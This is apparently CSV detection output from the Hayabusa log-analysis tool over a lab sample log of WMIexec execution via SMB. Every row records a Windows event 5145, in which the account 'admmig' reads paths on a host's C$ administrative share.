2021-04-22 20:32:30.160 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W39c436dd#\711dbd144f8f71a864ea8493a3877bc5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.160 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W69ef49d2# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.160 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W69ef49d2#\28242ebb69175640e01f44f44845482c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.191 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W71daf281# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W71daf281#\be26a3df8bcf20be912896fba8462d2f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W81a3882f# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W81a3882f#\84ae811d9df57eca1c9728263a6e6aff : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Default\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W708fc392# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W708fc392#\4f9e41de8acf7fe60bc43242811fbabd : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W5052cbb1# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W5052cbb1#\960951a3fe97e1a2bd2d09ced71ce4f3 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W57798b05# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W57798b05#\2145d62276d37b22799a8deb8d44b210 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W73044bb5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W73044bb5#\fb97af1f4b1eed42372eea20ba746a53 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W193497eb# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W193497eb#\a26561bad24a68eb0217aa9d9fdad386 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W08054466# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W08054466#\50e266485611719e095733dd021e3a42 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wad38fd8b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wad38fd8b#\44e2747436ee8621f4daf918b1922498 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wad78daf4# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wad78daf4#\748bf388335b4acc7031af4d134ad037 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wb2d030b7# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wb2d030b7#\7dbfc45fb55f5cf738956f4c7b2f8639 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wb9b5bb58# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wb9b5bb58#\789a3b275b1f5369ae5ab066e2461420 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wbc80354b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wbc80354b#\fac59f632a5e8454549a214641d7bf25 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wc1cc6649# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wc1cc6649#\996a8c9071e330fe0cfac06c4d9f2378 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wca5f1176# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wca5f1176#\f8b6726fa5f43478af33a92559c0cef2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wcffedcb4# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wcffedcb4#\f6be55d69bb92d49c71a4f9861c21451 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wd75d181a# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wd75d181a#\1a3848fefabdd8a28f5cae97106da369 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wd518ee0d# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wd518ee0d#\da3f8769af3163f94176c12ad223cb41 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.We9f24001# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.We9f24001#\6a6b3af569c21f51ab2982968ae2775d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.We0722664# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.We0722664#\559ec1b9bc74181e3591df47bdb6b7ce : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wed3937f9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wed3937f9#\4af7f054b14a220217737e71e6adff82 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wf493a5fb# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wf493a5fb#\1a4e8e027cdf1271603e7eba2cd8fab0 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\MIGUIControls : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\MIGUIControls\184c548bb9ea9e668823e3bedee4d86a : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\MMCEx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\MMCEx\85a6f67f65de23064f7deded08a464c5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\MMCFxCommon : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
